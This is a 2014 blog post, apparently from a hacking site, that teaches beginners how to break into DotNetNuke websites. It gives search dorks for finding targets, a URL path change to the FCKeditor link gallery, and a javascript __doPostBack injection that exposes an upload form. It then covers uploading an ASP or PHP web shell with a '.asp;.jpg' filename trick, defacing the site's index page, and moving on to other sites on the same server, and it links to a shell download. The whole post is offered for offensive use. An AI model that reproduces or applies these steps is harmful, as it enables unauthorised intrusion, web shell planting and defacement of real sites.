Saturday, 5 April 2014

   Hack DNN Site With Exploit Easy Trick For                           Beginners




Hello everyone!!

I am going to tell about Dot net nuke exploit.I know some of you know about it but it i
s very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.


Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.


What is DNN ?


DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.


Here is step by step tutorial:

Upload random file

Code:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,

*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,

*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,

*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob

by defualt but admin may change this and you will have a Shell directly

step 1:use this dork to find vulnerable site

Code:

inurl:home/tabid/36/language/en-US/Default.aspx

another dorks you can use

Code:

inurl:fcklinkgallery.aspx

inurl:/portals/0

step 2:now open any site like

Code:

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

so your url will become

Code:

http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

then hit enter


and if you are lucky you will get to the database easyly


step 3:Select 3rd option[file] 

Spoiler (Click to Hide)

[Image: temp3.jpg]


step 4: inject the following java code in browser address bar

Code:

javascript:__doPostBack('ctlURL$cmdUpload','')

you will get this upload option.

step 4:Now just upload your file for example mine is z.txt.when it is uploaded we can see it in root dir.

step 5:Navigate to 

Code:

http://www.vulsite.com/portals/0/z.txt

Spoiler (Click to Hide)

[Image: temp6h.jpg]


You can see our file successfully uploaded.


method to upload shell:


Things you need:

An ASP shell

r57 or C99 Shell or anyother shell


step 4:rename your asp shell to

Code:

yourshell.asp;.jpg

and upload it.


step 5:Navigate it through 

Code:

http://www.vulsite.com/portals/0/yourshell.asp;.jpg

step 6:Now upload your php shell using upload file option marked in above image.


step 7:Navigate it through 

Code:

http://www.vulsite.com/portals/0/yourphpshell.php

Voila you have your shell.Yeye


Deface

step 8:Now replace your index.html with original index.html.Thats it.


all sites in server 

Well you can hack all sites hosted on same server.

For that follow in image and click on that you will find all sites hosted on same server.Click on any one site and Now you know what to do..


Download ASP Shell Simple : Click Here To Download ASPShell

If You Wont Another Shell To Leave a Comment or your shell name 

0 comments:

Post a Comment